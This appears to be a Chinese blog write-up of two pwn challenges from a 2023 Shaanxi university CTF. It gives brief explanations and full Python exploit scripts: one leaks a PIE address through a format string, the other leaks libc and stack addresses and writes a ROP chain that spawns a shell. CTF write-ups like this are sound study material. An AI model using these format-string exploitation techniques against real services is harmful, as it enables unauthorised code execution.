2023年第三届陕西省大学生网络安全技能大赛-pwn-may be all?
前言
校队丢了两道题给我,看了看都是简单题,简单做了做。不知道具体叫什么名,就用pwn1、pwn2代替了。
pwn1
简单的格式化字符串泄露,除了远程docker的变量偏移不一样之外,没什么好说的。(出题人的docker可能有问题
#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-06-03 13:55:30
Usage:
Debug : python3 exp.py debug elf-file-path -t -b malloc
Remote: python3 exp.py remote elf-file-path ip:port
'''
from pwncli import *
cli_script()
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
filename = gift.filename # current filename
is_debug = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid = gift.gdb_pid # gdb pid if debug
sla('choice :','2')
sla('Terra_Cotta_Warriors\n','%19$p')
leak_elf = int(rl()[:-1],16)
leak_ex2(leak_elf)
eb = leak_elf - elf.sym.main
leak_ex2(eb)
sla('choice :','1')
sl(flat(
{
40:eb + 0x129a
}
))
ia()
pwn2
简单的格式化字符串。改rbp链,然后考虑i变量与libc start main的返回地址在同一页的时候不断更改变量i的值以及在libc start main上写rop链。最后还原rbp即可。(现在仔细想想其实利用bss和修改rbp可以直接栈迁移到bss段上,这样好像会方便一点?
#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-06-03 14:06:17
Usage:
Debug : python3 exp.py debug elf-file-path -t -b malloc
Remote: python3 exp.py remote elf-file-path ip:port
'''
from pwncli import *
cli_script()
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
filename = gift.filename # current filename
is_debug = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid = gift.gdb_pid # gdb pid if debug
def attack_8_bits(val,attack_addr,i_addr):
for i in range(6):
pd = flat(
{
0:'%'+str(attack_addr+i&0xff)+'c'+'%8$hhn',
0x40:''
},filler = '\x00'
)
sa('say?\n',pd)
pd = flat(
{
0:'%'+str(val&0xff)+'c'+'%10$hhn',
0x40:''
},filler = '\x00'
)
sa('say?\n',pd)
sleep(0.05)
pd = flat(
{
0:'%'+str(i_addr&0xff)+'c'+'%8$hhn',
0x40:''
},filler = '\x00'
)
sa('say?\n',pd)
pd = flat(
{
0:'%10$n',
0x40:''
},filler = '\x00'
)
sa('say?\n',pd)
val = val >> 8
pd = flat(
{
0x0:'TokameinE_is_the_best_pwner\x00\x00'
},filler = '\x00'
)
sa('is?\n',pd)
pd = flat(
{
0:'%29$p-%8$p-',
}
)
sa('say?\n',pd)
sleep(0.05)
leak_libc = int(ru('-')[:-1],16)
leak_ex2(leak_libc)
lb = leak_libc - 0x20840
libc.address = lb
leak_ex2(lb)
leak_stack = int(ru('-')[:-1],16)
leak_ex2(leak_stack)
attack_stack = leak_stack + 0x98
ori_ebp = leak_stack + 0x90
i_addr = leak_stack - 0x14
pop_rdi = CurrentGadgets.pop_rdi_ret()
attack_8_bits(pop_rdi,attack_stack,i_addr)
attack_8_bits(CurrentGadgets.bin_sh(),attack_stack+8,i_addr)
attack_8_bits(libc.sym.system,attack_stack+0x10,i_addr)
pd = flat(
{
0:'%'+str(ori_ebp&0xff)+'c'+'%8$hhn',
0x40:''
},filler = '\x00'
)
sa('say?\n',pd)
for i in range(12):
sa('say?\n',p64(0xdeadbeef))
ia()
标签:gift,may,leak,elf,debug,libc,pd,2023,pwn
From: https://www.cnblogs.com/7resp4ss/p/17455559.html